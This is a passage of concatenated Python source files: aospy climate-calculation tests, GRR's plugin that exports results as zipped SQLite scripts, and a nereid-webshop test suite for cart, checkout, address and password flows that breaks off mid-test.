'(vertical integral of m): m kg m^-2)', 'rain')]) def test_attrs(units, description, dtype_out_vert, expected_units, expected_description): da = xr.DataArray(None) ds = xr.Dataset({'bar': 'foo', 'boo': 'baz'}) da = _add_metadata_as_attrs(da, units, description, dtype_out_vert) ds = _add_metadata_as_attrs(ds, units, description, dtype_out_vert) assert expected_units == da.attrs['units'] assert expected_description == da.attrs['description'] for name, arr in ds.data_vars.items(): assert expected_units == arr.attrs['units'] assert expected_description == arr.attrs['description'] @pytest.fixture() def 
recursive_test_params(): basic_params = { 'proj': example_proj, 'model': example_model, 'run': example_run, 'var': condensation_rain, 'date_range': (datetime.datetime(4, 1, 1), datetime.datetime(6, 12, 31)), 'intvl_in': 'monthly', 'dtype_in_time': 'ts' } recursive_params = basic_params.copy() recursive_condensation_rain = Var( name='recursive_condensation_rain', variables=(precip, convection_rain), func=lambda x, y: x - y, def_time=True) recursive_params['var'] = recursive_condensation_rain yield (basic_params, recursive_params) _clean_test_direcs() def test_recursive_calculation(recursive_test_params): basic_params, recursive_params = recursive_test_params calc = Calc(intvl_out='ann', dtype_out_time='av', **basic_params) calc = calc.compute() expected = xr.open_dataset( calc.path_out['av'])['condensation_rain'] _test_files_and_attrs(calc, 'av') calc = Calc(intvl_out='ann', dtype_out_time='av', **recursive_params) calc = calc.compute() result = xr.open_dataset( calc.path_out['av'])['recursive_condensation_rain'] _test_files_and_attrs(calc, 'av') xr.testing.assert_equal(expected, result) def test_compute_pressure(): calc = Calc( intvl_out='ann', dtype_out_time='av', var=p, proj=example_proj, model=example_model, run=example_run, date_range=('0006', '0006'), intvl_in='monthly', dtype_in_time='ts', dtype_in_vert='sigma', dtype_out_vert=None ) calc.compute() _test_files_and_attrs(calc, 'av') _clean_test_direcs() def test_compute_pressure_thicknesses(): calc = Calc( intvl_out='ann', dtype_out_time='av', var=dp, proj=example_proj, model=example_model, run=example_run, date_range=('0006', '0006'), intvl_in='monthly', dtype_in_time='ts', dtype_in_vert='sigma', dtype_out_vert=None ) calc.compute() _test_files_and_attrs(calc, 'av') _clean_test_direcs() @pytest.mark.parametrize( ['dtype_in_vert', 'expected'], [(ETA_STR, [p_eta, dp_eta, condensation_rain, 5]), ('pressure', [p_level, dp_level, condensation_rain, 5])]) def test_replace_pressure(dtype_in_vert, expected): arguments = [p, dp, condensation_rain, 5] p_in, dp_in, cond, num = arguments p_expected, dp_expected, cond_expected, num_expected = expected assert p_in.func != p_expected.func assert dp_in.func != dp_expected.func result = _replace_pressure(arguments, dtype_in_vert) p_out, dp_out, cond_out, num_out = result assert p_out.func == p_expected.func assert dp_out.func == dp_expected.func assert cond_out.func == cond_expected.func assert num_out == num_expected if __name__ == '__main__': unittest.main()
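# A hedged sketch of the derived-variable pattern exercised by
# test_recursive_calculation() above: an aospy Var built from other Vars via
# `func`, which Calc resolves recursively. The name below is illustrative;
# `precip` and `convection_rain` are the test data objects imported at the
# top of this file.
hypothetical_net_rain = Var(
    name='hypothetical_net_rain',
    variables=(precip, convection_rain),
    func=lambda total, convective: total - convective,
    def_time=True,
)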
#!/usr/bin/env python """Plugin that exports results as SQLite db scripts.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals import collections import io import os import zipfile from future.builtins import str from future.utils import iteritems from future.utils import iterkeys from future.utils import itervalues import sqlite3 from grr_response_core.lib import rdfvalue from grr_response_core.lib import utils from grr_response_core.lib.rdfvalues import structs as rdf_structs from grr_response_core.lib.util import collection from grr_response_core.lib.util.compat import yaml from grr_response_server import instant_output_plugin class Rdf2SqliteAdapter(object): """An adapter for converting RDF values to a SQLite-friendly form.""" class Converter(object): def __init__(self, sqlite_type, convert_fn): self.sqlite_type = sqlite_type self.convert_fn = convert_fn BYTES_CONVERTER = Converter("BLOB", bytes) STR_CONVERTER = Converter("TEXT", str) DEFAULT_CONVERTER = STR_CONVERTER INT_CONVERTER = Converter("INTEGER", int) # Converters for fields that have a semantic type annotation in their # protobuf definition. SEMANTIC_CONVERTERS = { rdfvalue.RDFString: STR_CONVERTER, rdfvalue.RDFBytes: BYTES_CONVERTER, rdfvalue.RDFInteger: INT_CONVERTER, bool: INT_CONVERTER, # Sqlite does not have a bool type. rdfvalue.RDFDatetime: Converter("INTEGER", lambda x: x.AsMicrosecondsSinceEpoch()), rdfvalue.RDFDatetimeSeconds: Converter("INTEGER", lambda x: x.AsSecondsSinceEpoch() * 1000000), rdfvalue.DurationSeconds: Converter("INTEGER", lambda x: x.microseconds), } # Converters for fields that do not have a semantic type annotation in their # protobuf definition. NON_SEMANTIC_CONVERTERS = { rdf_structs.ProtoBinary: BYTES_CONVERTER, rdf_structs.ProtoString: STR_CONVERTER, rdf_structs.ProtoEnum: STR_CONVERTER, rdf_structs.ProtoUnsignedInteger: INT_CONVERTER, rdf_structs.ProtoSignedInteger: INT_CONVERTER, rdf_structs.ProtoFixed32: INT_CONVERTER, rdf_structs.ProtoFixed64: INT_CONVERTER, rdf_structs.ProtoFloat: Converter("REAL", float), rdf_structs.ProtoDouble: Converter("REAL", float), rdf_structs.ProtoBoolean: INT_CONVERTER, } @staticmethod def GetConverter(type_info): if type_info.__class__ is rdf_structs.ProtoRDFValue: return Rdf2SqliteAdapter.SEMANTIC_CONVERTERS.get( type_info.type, Rdf2SqliteAdapter.DEFAULT_CONVERTER) else: return Rdf2SqliteAdapter.NON_SEMANTIC_CONVERTERS.get( type_info.__class__, Rdf2SqliteAdapter.DEFAULT_CONVERTER) class SqliteInstantOutputPlugin( instant_output_plugin.InstantOutputPluginWithExportConversion): """Instant output plugin that converts results into SQLite db commands.""" plugin_name = "sqlite-zip" friendly_name = "SQLite scripts (zipped)" description = "Output ZIP archive containing SQLite scripts." 
output_file_extension = ".zip" ROW_BATCH = 100 def __init__(self, *args, **kwargs): super(SqliteInstantOutputPlugin, self).__init__(*args, **kwargs) self.archive_generator = None # Created in Start() self.export_counts = {} @property def path_prefix(self): prefix, _ = os.path.splitext(self.output_file_name) return prefix def Start(self): self.archive_generator = utils.StreamingZipGenerator( compression=zipfile.ZIP_DEFLATED) self.export_counts = {} return [] def ProcessSingleTypeExportedValues(self, original_value_type, exported_values): first_value = next(exported_values, None) if not first_value: return if not isinstance(first_value, rdf_structs.RDFProtoStruct): raise ValueError("The SQLite plugin only supports export-protos") yield self.archive_generator.WriteFileHeader( "%s/%s_from_%s.sql" % (self.path_prefix, first_value.__class__.__name__, original_value_type.__name__)) table_name = "%s.from_%s" % (first_value.__class__.__name__, original_value_type.__name__) schema = self._GetSqliteSchema(first_value.__class__) # We will buffer the sql statements into an in-memory sql database before # dumping them to the zip archive. We rely on the PySQLite library for # string escaping. db_connection = sqlite3.connect(":memory:") db_cursor = db_connection.cursor() yield self.archive_generator.WriteFileChunk( "BEGIN TRANSACTION;\n".encode("utf-8")) with db_connection: buf = io.StringIO() buf.write(u"CREATE TABLE \"%s\" (\n " % table_name) column_types = [(k, v.sqlite_type) for k, v in iteritems(schema)] buf.write(u",\n ".join([u"\"%s\" %s" % (k, v) for k, v in column_types])) buf.write(u"\n);") db_cursor.execute(buf.getvalue()) chunk = (buf.getvalue() + "\n").encode("utf-8") yield self.archive_generator.WriteFileChunk(chunk) self._InsertValueIntoDb(table_name, schema, first_value, db_cursor) for sql in self._FlushAllRows(db_connection, table_name): yield sql counter = 1 for batch in collection.Batch(exported_values, self.ROW_BATCH): counter += len(batch) with db_connection: for value in batch: self._InsertValueIntoDb(table_name, schema, value, db_cursor) for sql in self._FlushAllRows(db_connection, table_name): yield sql db_connection.close() yield self.archive_generator.WriteFileChunk("COMMIT;\n".encode("utf-8")) yield self.archive_generator.WriteFileFooter() counts_for_original_type = self.export_counts.setdefault( original_value_type.__name__, dict()) counts_for_original_type[first_value.__class__.__name__] = counter def _GetSqliteSchema(self, proto_struct_class, prefix=""): """Returns a mapping of SQLite column names to Converter objects.""" schema = collections.OrderedDict() for type_info in proto_struct_class.type_infos: if type_info.__class__ is rdf_structs.ProtoEmbedded: schema.update( self._GetSqliteSchema( type_info.type, prefix="%s%s." 
% (prefix, type_info.name))) else: field_name = prefix + type_info.name schema[field_name] = Rdf2SqliteAdapter.GetConverter(type_info) return schema def _InsertValueIntoDb(self, table_name, schema, value, db_cursor): sql_dict = self._ConvertToCanonicalSqlDict(schema, value.ToPrimitiveDict()) buf = io.StringIO() buf.write(u"INSERT INTO \"%s\" (\n " % table_name) buf.write(u",\n ".join(["\"%s\"" % k for k in iterkeys(sql_dict)])) buf.write(u"\n)") buf.write(u"VALUES (%s);" % u",".join([u"?"] * len(sql_dict))) db_cursor.execute(buf.getvalue(), list(itervalues(sql_dict))) def _ConvertToCanonicalSqlDict(self, schema, raw_dict, prefix=""): """Converts a dict of RDF values into a SQL-ready form.""" flattened_dict = {} for k, v in iteritems(raw_dict): if isinstance(v, dict): flattened_dict.update( self._ConvertToCanonicalSqlDict( schema, v, prefix="%s%s." % (prefix, k))) else: field_name = prefix + k flattened_dict[field_name] = schema[field_name].convert_fn(v) return flattened_dict def _FlushAllRows(self, db_connection, table_name): """Copies rows from the given db into the output file then deletes them.""" for sql in db_connection.iterdump(): if (sql.startswith("CREATE TABLE") or sql.startswith("BEGIN TRANSACTION") or sql.startswith("COMMIT")): # These statements only need to be written once. continue # The archive generator expects strings (not Unicode objects returned by # the pysqlite library). yield self.archive_generator.WriteFileChunk((sql + "\n").encode("utf-8")) with db_connection: db_connection.cursor().execute("DELETE FROM \"%s\";" % table_name) def Finish(self): manifest = {"export_stats": self.export_counts} manifest_bytes = yaml.Dump(manifest).encode("utf-8") header = self.path_prefix + "/MANIFEST" yield self.archive_generator.WriteFileHeader(header) yield self.archive_generator.WriteFileChunk(manifest_bytes) yield self.archive_generator.WriteFileFooter() yield self.archive_generator.Close()
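# Minimal standalone sketch of the flattening scheme used by _GetSqliteSchema
# and _ConvertToCanonicalSqlDict above: nested message fields become dotted
# column names, and rows go through parameterised INSERTs so sqlite3 handles
# the escaping.  The table and field names below are invented for illustration.
import sqlite3


def _flatten(raw, prefix=""):
    flat = {}
    for key, value in raw.items():
        if isinstance(value, dict):
            flat.update(_flatten(value, prefix="%s%s." % (prefix, key)))
        else:
            flat[prefix + key] = value
    return flat


row = _flatten({"st_size": 42, "pathspec": {"path": "/etc/passwd"}})
columns = ", ".join('"%s"' % name for name in row)
connection = sqlite3.connect(":memory:")
connection.execute('CREATE TABLE "ExportedFile.from_StatEntry" (%s)' % columns)
connection.execute(
    'INSERT INTO "ExportedFile.from_StatEntry" (%s) VALUES (%s)'
    % (columns, ", ".join("?" * len(row))), list(row.values()))
print(list(connection.execute('SELECT * FROM "ExportedFile.from_StatEntry"')))
# -> [(42, '/etc/passwd')] with columns "st_size" and "pathspec.path"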
import unittest import datetime import trytond from trytond.tests.test_tryton import USER, DB_NAME, CONTEXT, POOL from trytond.transaction import Transaction from test_base import BaseTestCase from trytond.config import config from decimal import Decimal from nereid import request config.set('email', 'from', 'from@xyz.com') class TestTemplates(BaseTestCase): """ Test case for templates in nereid-webshop. """ def setUp(self): """ setUp method """ trytond.tests.test_tryton.install_module('nereid_catalog_variants') super(TestTemplates, self).setUp() def cart(self, to_login): """ Checking cart functionality with and without login. Used by test_cart. """ qty = 7 with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() self.create_test_products() template1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) product1 = template1.products[0] with app.test_client() as c: if to_login: self.login(c, "email@example.com", "password") rv = c.get('/cart') self.assertEqual(rv.status_code, 200) sales = self.Sale.search([]) self.assertEqual(len(sales), 0) c.post( '/cart/add', data={ 'product': product1.id, 'quantity': qty } ) rv = c.get('/cart') self.assertEqual(rv.status_code, 200) sales = self.Sale.search([]) self.assertEqual(len(sales), 1) sale = sales[0] self.assertEqual(len(sale.lines), 1) self.assertEqual( sale.lines[0].product, product1.products[0] ) self.assertEqual(sale.lines[0].quantity, qty) def test_0010_home_template(self): """ Test for home template. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: rv = c.get('/') self.assertEqual(rv.status_code, 200) self.assertEqual(request.path, '/') def test_0015_login(self): """ Test for login template. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: rv = c.get('/login') self.assertEqual(rv.status_code, 200) rv2 = self.login(c, 'email@example.com', 'password') self.assertIn('Redirecting', rv2.data) self.assertTrue(rv2.location.endswith('localhost/')) with self.assertRaises(AssertionError): self.login(c, 'email@example.com', 'wrong') def test_0020_registration(self): """ Test for registration template. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: rv = c.get('/registration') self.assertEqual(rv.status_code, 200) data = { 'name': 'Registered User', 'email': 'regd_user@openlabs.co.in', 'password': 'password' } response = c.post('/registration', data=data) self.assertEqual(response.status_code, 200) data['confirm'] = 'password' response = c.post('/registration', data=data) self.assertEqual(response.status_code, 302) def test_0025_nodes(self): """ Tests for nodes/subnodes. Tests node properties. 
""" with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() uom, = self.Uom.search([], limit=1) values1 = { 'name': 'Product-1', 'category': self.category.id, 'type': 'goods', 'default_uom': uom.id, 'products': [ ('create', [{ 'uri': 'product-1', 'displayed_on_eshop': True, 'list_price': Decimal('10'), 'cost_price': Decimal('5'), }]) ] } values2 = { 'name': 'Product-2', 'category': self.category.id, 'default_uom': uom.id, 'products': [ ('create', [{ 'uri': 'product-2', 'displayed_on_eshop': True, 'list_price': Decimal('10'), 'cost_price': Decimal('5'), }, { 'uri': 'product-21', 'displayed_on_eshop': True, 'list_price': Decimal('10'), 'cost_price': Decimal('5'), }]) ] } values3 = { 'name': 'Product-3', 'category': self.category.id, 'default_uom': uom.id, 'products': [ ('create', [{ 'uri': 'product-3', 'displayed_on_eshop': True, 'list_price': Decimal('10'), 'cost_price': Decimal('5'), }]) ] } template1, template2, template3, = self.ProductTemplate.create([ values1, values2, values3 ]) node1, = self.Node.create([{ 'name': 'Node1', 'type_': 'catalog', 'slug': 'node1', }]) self.assert_(node1) node2, = self.Node.create([{ 'name': 'Node2', 'type_': 'catalog', 'slug': 'node2', 'display': 'product.template', }]) node3, = self.Node.create([{ 'name': 'Node3', 'type_': 'catalog', 'slug': 'node3', }]) self.Node.write([node2], { 'parent': node1 }) self.Node.write([node3], { 'parent': node2 }) # Create Product-Node relationships. self.ProductNodeRelationship.create([{ 'product': pro, 'node': node1, } for pro in template1.products]) self.ProductNodeRelationship.create([{ 'product': pro, 'node': node2, } for pro in template2.products]) self.ProductNodeRelationship.create([{ 'product': pro, 'node': node3, } for pro in template3.products]) app = self.get_app() for node in [node1, node2, node3]: self.assert_(node) self.assertEqual(node2.parent, node1) with app.test_client() as c: url = 'nodes/{0}/{1}/{2}'.format( node1.id, node1.slug, 1 ) rv = c.get('/nodes/{0}/{1}'.format(node1.id, node1.slug)) self.assertEqual(rv.status_code, 200) url = 'nodes/{0}/{1}/{2}'.format( node2.id, node2.slug, 1 ) rv = c.get(url) self.assertEqual(rv.status_code, 200) def test_0030_articles(self): """ Tests the rendering of an article. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() article, = self.Article.search([ ('uri', '=', 'test-article') ]) categ, = self.ArticleCategory.search([ ('title', '=', 'Test Categ') ]) self.assertEqual(len(categ.published_articles), 0) self.Article.publish([article]) self.assertEqual(len(categ.published_articles), 1) with app.test_client() as c: response = c.get('/article/test-article') self.assertEqual(response.status_code, 200) self.assertIn('Test Content', response.data) self.assertIn('Test Article', response.data) def test_0035_cart(self): """ Test the cart. """ for to_login in [True, False]: print("Login?: {0}".format(to_login)) self.cart(to_login) def test_0040_addresses(self): """ Test addresses. 
""" with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: rv = c.get('/view-address') self.assertEqual(rv.status_code, 302) self.login(c, 'email@example.com', 'password') rv = c.get('/view-address') self.assertEqual(rv.status_code, 200) # Creating an address rv = c.get('/create-address') self.assertEqual(rv.status_code, 200) data = { 'name': 'Some Dude', 'street': 'Test Street', 'zip': 'zip', 'city': 'city', 'email': 'email@example.com', 'phone': '123456789', 'country': self.available_countries[0].id, 'subdivision': self.Country( self.available_countries[0] ).subdivisions[0].id } # Check if zero addresses before posting. self.assertEqual( len(self.registered_user.party.addresses), 0 ) response = c.post( '/create-address', data=data ) self.assertEqual(response.status_code, 302) # Check that our address info is present in template data. address, = self.registered_user.party.addresses rv = c.get('/view-address') self.assertIn(data['name'], rv.data) self.assertIn(data['street'], rv.data) self.assertIn(data['city'], rv.data) self.assertEqual(rv.status_code, 200) self.assertEqual( len(self.registered_user.party.addresses), 1 ) # Now edit some bits of the address and view it again. rv = c.get('/edit-address/{0}'.format(address.id)) self.assertEqual(rv.status_code, 200) response = c.post( '/edit-address/{0}'.format(address.id), data={ 'name': 'Some Other Dude', 'street': 'Street', 'streetbis': 'StreetBis', 'zip': 'zip', 'city': 'City', 'email': 'email@example.com', 'phone': '1234567890', 'country': self.available_countries[0].id, 'subdivision': self.Country( self.available_countries[0]).subdivisions[0].id, } ) self.assertEqual(response.status_code, 302) rv = c.get('/view-address') self.assertIn('Some Other Dude', rv.data) with self.assertRaises(AssertionError): self.assertIn(data['name'], rv.data) # Now remove the address. rv = c.post( '/remove-address/{0}' .format(address.id) ) self.assertEqual(rv.status_code, 302) self.assertEqual( len(self.registered_user.party.addresses), 0 ) def test_0045_wishlist(self): """ Tests the wishlist. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() self.create_test_products() app = self.get_app() with app.test_client() as c: # Guests will be redirected. rv = c.post( '/wishlists', data={ 'name': 'Testlist' } ) self.assertEquals(rv.status_code, 302) self.login(c, 'email@example.com', 'password') # No wishlists currently. self.assertEqual( len(self.registered_user.wishlists), 0 ) rv = c.post( '/wishlists', data={ 'name': 'Testlist' } ) self.assertEqual(rv.status_code, 302) self.assertEqual( len(self.registered_user.wishlists), 1 ) rv = c.get('/wishlists') self.assertIn('Testlist', rv.data) # Remove this wishlist. rv = c.delete( '/wishlists/{0}'.format( self.registered_user.wishlists[0].id ) ) self.assertEqual(rv.status_code, 200) # Now add products. product1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) product2, = self.ProductTemplate.search([ ('name', '=', 'product 2') ]) # Adding a product without creating a wishlist # creates a wishlist automatically. 
rv = c.post( 'wishlists/products', data={ 'product': product1.products[0].id, 'action': 'add' } ) self.assertEqual(rv.status_code, 302) self.assertEqual(len(self.registered_user.wishlists), 1) self.assertEqual( len(self.registered_user.wishlists[0].products), 1 ) rv = c.get( '/wishlists/{0}' .format(self.registered_user.wishlists[0].id) ) self.assertIn(product1.name, rv.data) # Add another product. rv = c.post( 'wishlists/products', data={ 'product': product2.products[0].id, 'action': 'add', 'wishlist': self.registered_user.wishlists[0].id } ) self.assertEqual(rv.status_code, 302) self.assertEqual( len(self.registered_user.wishlists[0].products), 2 ) rv = c.get( '/wishlists/{0}' .format(self.registered_user.wishlists[0].id) ) self.assertIn(product2.name, rv.data) # Remove a product rv = c.post( 'wishlists/products', data={ 'product': product2.products[0].id, 'wishlist': self.registered_user.wishlists[0].id, 'action': 'remove' } ) self.assertEqual(rv.status_code, 302) self.assertEqual( len(self.registered_user.wishlists[0].products), 1 ) rv = c.get( '/wishlists/{0}' .format(self.registered_user.wishlists[0].id) ) self.assertNotIn(product2.name, rv.data) @unittest.skip("Not implemented yet.") def test_0050_profile(self): """ Test the profile. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: # Without login. rv = c.get('/me') self.assertEqual(rv.status_code, 302) self.login(c, 'email@example.com', 'password') rv = c.post( '/me', data={ 'display_name': 'Pritish C', 'timezone': 'Asia/Kolkata' } ) self.assertEqual(rv.status_code, 302) rv = c.get('/me') self.assertIn('Pritish C', rv.data) self.assertIn('Asia/Kolkata', rv.data) def test_0055_guest_checkout(self): """ Test for guest checkout. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() self.create_test_products() app = self.get_app() product1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) product2, = self.ProductTemplate.search([ ('name', '=', 'product 2') ]) country = self.Country(self.available_countries[0]) subdivision = country.subdivisions[0] with app.test_client() as c: rv = c.post( '/cart/add', data={ 'product': product1.products[0].id, 'quantity': 5 } ) self.assertEqual(rv.status_code, 302) rv = c.get('/checkout/sign-in') self.assertEqual(rv.status_code, 200) # Trying to checkout with a registered email. # Should fail. rv = c.post( '/checkout/sign-in', data={ 'email': 'email@example.com' } ) self.assertEqual(rv.status_code, 200) self.assertIn( '{0}'.format(self.registered_user.email), rv.data ) self.assertIn( 'is tied to an existing account', rv.data ) # Now with a new email. rv = c.post( '/checkout/sign-in', data={ 'email': 'new@example.com', 'checkout_mode': 'guest' } ) self.assertEqual(rv.status_code, 302) self.assertTrue( rv.location.endswith('/checkout/shipping-address') ) # Shipping address page should render. rv = c.get('/checkout/shipping-address') self.assertEqual(rv.status_code, 200) # Copied from nereid-checkout - adding shipping address. rv = c.post( '/checkout/shipping-address', data={ 'name': 'Sharoon Thomas', 'street': 'Biscayne Boulevard', 'streetbis': 'Apt. 1906, Biscayne Park', 'zip': 'FL33137', 'city': 'Miami', 'phone': '1234567890', 'country': country.id, 'subdivision': subdivision.id, } ) self.assertEqual(rv.status_code, 302) self.assertTrue( rv.location.endswith('/checkout/validate-address') ) # Copied from nereid-checkout - adding billing address. 
rv = c.post( '/checkout/billing-address', data={ 'name': 'Sharoon Thomas', 'street': 'Biscayne Boulevard', 'streetbis': 'Apt. 1906, Biscayne Park', 'zip': 'FL33137', 'city': 'Miami', 'phone': '1234567890', 'country': country.id, 'subdivision': subdivision.id, } ) self.assertEqual(rv.status_code, 302) self.assertTrue( rv.location.endswith('/checkout/payment') ) with Transaction().set_context(company=self.company.id): self._create_auth_net_gateway_for_site() # Try to pay using credit card rv = c.post( '/checkout/payment', data={ 'owner': 'Joe Blow', 'number': '4111111111111111', 'expiry_year': '2018', 'expiry_month': '01', 'cvv': '911', 'add_card_to_profiles': True, } ) self.assertEqual(rv.status_code, 302) self.assertTrue('/order/' in rv.location) self.assertTrue('access_code' in rv.location) sale, = self.Sale.search([('state', '=', 'confirmed')]) self.Sale.proceed([sale]) self.Sale.process_all_pending_payments() payment_transaction, = sale.gateway_transactions self.assertEqual(payment_transaction.amount, sale.total_amount) rv = c.get('/order/{0}'.format(sale.id)) self.assertEqual(rv.status_code, 302) # Orders page redirect def test_0060_registered_checkout(self): """ Test for registered user checkout. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() self.create_test_products() app = self.get_app() product1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) product2, = self.ProductTemplate.search([ ('name', '=', 'product 2') ]) country = self.Country(self.available_countries[0]) subdivision = country.subdivisions[0] with app.test_client() as c: rv = c.post( '/cart/add', data={ 'product': product1.products[0].id, 'quantity': 5 } ) self.assertEqual(rv.status_code, 302) # Now sign in to checkout. rv = c.post( '/checkout/sign-in', data={ 'email': 'email@example.com', 'password': 'password', 'checkout_mode': 'account' } ) self.assertEqual(rv.status_code, 302) self.assertTrue(rv.location.endswith('/shipping-address')) # Shipping address page should render. rv = c.get('/checkout/shipping-address') self.assertEqual(rv.status_code, 200) # Copied from nereid-checkout - adding shipping address. rv = c.post( '/checkout/shipping-address', data={ 'name': 'Sharoon Thomas', 'street': 'Biscayne Boulevard', 'streetbis': 'Apt. 1906, Biscayne Park', 'zip': 'FL33137', 'city': 'Miami', 'phone': '1234567890', 'country': country.id, 'subdivision': subdivision.id, } ) self.assertEqual(rv.status_code, 302) self.assertTrue( rv.location.endswith('/checkout/validate-address') ) # Copied from nereid-checkout - adding billing address. rv = c.post( '/checkout/billing-address', data={ 'name': 'Sharoon Thomas', 'street': 'Biscayne Boulevard', 'streetbis': 'Apt. 
1906, Biscayne Park', 'zip': 'FL33137', 'city': 'Miami', 'phone': '1234567890', 'country': country.id, 'subdivision': subdivision.id, } ) self.assertEqual(rv.status_code, 302) self.assertTrue( rv.location.endswith('/checkout/payment') ) with Transaction().set_context(company=self.company.id): self._create_auth_net_gateway_for_site() # Try to pay using credit card rv = c.post( '/checkout/payment', data={ 'owner': 'Joe Blow', 'number': '4111111111111111', 'expiry_year': '2018', 'expiry_month': '01', 'cvv': '911', 'add_card_to_profiles': '', } ) self.assertEqual(rv.status_code, 302) self.assertTrue('/order/' in rv.location) self.assertTrue('access_code' in rv.location) sale, = self.Sale.search([('state', '=', 'confirmed')]) self.Sale.proceed([sale]) self.Sale.process_all_pending_payments() payment_transaction, = sale.gateway_transactions self.assertEqual(payment_transaction.amount, sale.total_amount) rv = c.get('/order/{0}'.format(sale.id)) self.assertEqual(rv.status_code, 200) rv = c.get( '/order/{0}?access_code={1}' .format(sale.id, sale.guest_access_code) ) self.assertEqual(rv.status_code, 200) def test_0065_password_reset(self): """ Test for password reset. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: # Resetting without login rv = c.get('/reset-account') self.assertEqual(rv.status_code, 200) # Resetting through email response = c.post( '/reset-account', data={ 'email': 'email@example.com' } ) self.assertEqual(response.status_code, 302) # Login after requesting activation code. self.login(c, 'email@example.com', 'password') # Reset properly. with app.test_client() as c: response = c.post( '/reset-account', data={ 'email': 'email@example.com' } ) self.assertEqual(response.status_code, 302) # Resetting with an invalid code. # Login with new pass should be rejected. invalid = 'badcode' response = c.post( '/new-password/{0}/{1}'.format( self.registered_user.id, invalid ), data={ 'password': 'reset-pass', 'confirm': 'reset-pass' } ) self.assertEqual(response.status_code, 302) response = c.post( '/login', data={ 'email': 'email@example.com', 'password': 'reset-pass' } ) # rejection self.assertEqual(response.status_code, 200) # Now do it with the right code. # This time, login with old pass should be rejected. response = c.post( self.registered_user.get_reset_password_link(), data={ 'password': 'reset-pass', 'confirm': 'reset-pass' } ) self.assertEqual(response.status_code, 302) response = c.post( '/login', data={ 'email': 'email@example.com', 'password': 'password' } ) self.assertEqual(response.status_code, 200) self.login(c, 'email@example.com', 'reset-pass') def test_0070_change_password(self): """ Test for password change. 
""" with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() data = { 'party': self.party2.id, 'display_name': 'Registered User', 'email': 'email@example.com', 'password': 'password', 'company': self.company.id } with app.test_client() as c: response = c.get('/change-password') # Without login self.assertEqual(response.status_code, 302) # Try POST, but without login response = c.post('/change-password', data={ 'password': data['password'], 'confirm': data['password'] }) self.assertEqual(response.status_code, 302) # Now login self.login(c, data['email'], data['password']) # Incorrect password confirmation response = c.post( '/change-password', data={ 'password': 'new-password', 'confirm': 'oh-no-you-dont' } ) self.assertEqual(response.status_code, 200) self.assertTrue("must match" in response.data) # Send proper confirmation but without old password. response = c.post( '/change-password', data={ 'password': 'new-pass', 'confirm': 'new-pass' } ) self.assertEqual(response.status_code, 200) # Send proper confirmation with wrong old password response = c.post( '/change-password', data={ 'old_password': 'passw', 'password': 'new-pass', 'confirm': 'new-pass' } ) self.assertEqual(response.status_code, 200) self.assertTrue( 'current password you entered is invalid' in response.data ) # Do it right response = c.post( '/change-password', data={ 'old_password': data['password'], 'password': 'new-pass', 'confirm': 'new-pass' } ) self.assertEqual(response.status_code, 302) # Check login with new pass c.get('/logout') self.login(c, data['email'], 'new-pass') def test_0075_products(self): """ Tests product templates and variants. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: self.create_test_products() template1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) rv = c.get('/products') self.assertIn('product 1', rv.data) self.assertIn('product 2', rv.data) self.assertIn('product 3', rv.data) rv = c.get('/product/product-1') self.assertEqual(rv.status_code, 200) self.assertIn('product 1', rv.data) template1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) template1.active = False template1.save() rv = c.get('/product/product-1') self.assertEqual(rv.status_code, 404) def test_0080_search_results(self): """ Test the search results template. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: self.create_test_products() rv = c.get('/search?q=product') self.assertIn('product 1', rv.data) self.assertIn('product-1', rv.data) self.assertIn('product 2', rv.data) self.assertIn('product-2', rv.data) self.assertIn('product 3', rv.data) self.assertIn('product-3', rv.data) def test_0090_product_inventory(self): """ Tests the product template for cases of 'In Stock', 'Out Of Stock' and 'X <uom>s available'. 
""" StockMove = POOL.get('stock.move') with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() del self.templates['product.jinja'] app = self.get_app() self.create_test_products() template1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) product1 = template1.products[0] with app.test_request_context('/'): # Check serialize method res = product1.serialize(purpose='variant_selection') self.assertIn('inventory_status', res) with app.test_client() as c: rv = c.get('/product/product-1') # No inventory made yet, and product is goods type self.assertIn('In stock', rv.data) # Let's create inventory website, = self.NereidWebsite.search([]) supplier, = self.Location.search([('code', '=', 'SUP')]) stock1, = StockMove.create([{ 'product': product1.id, 'uom': template1.sale_uom.id, 'quantity': 10, 'from_location': supplier, 'to_location': website.stock_location.id, 'company': website.company.id, 'unit_price': Decimal('1'), 'currency': website.currencies[0].id, 'planned_date': datetime.date.today(), 'effective_date': datetime.date.today(), 'state': 'draft', }]) StockMove.write([stock1], { 'state': 'done' }) product1.display_available_quantity = True product1.start_displaying_available_quantity = 10 product1.min_warehouse_quantity = 5 product1.save() # min_warehouse_quantity < quantity <= start_displaying with app.test_client() as c: rv = c.get('/product/product-1') # X <uom> available 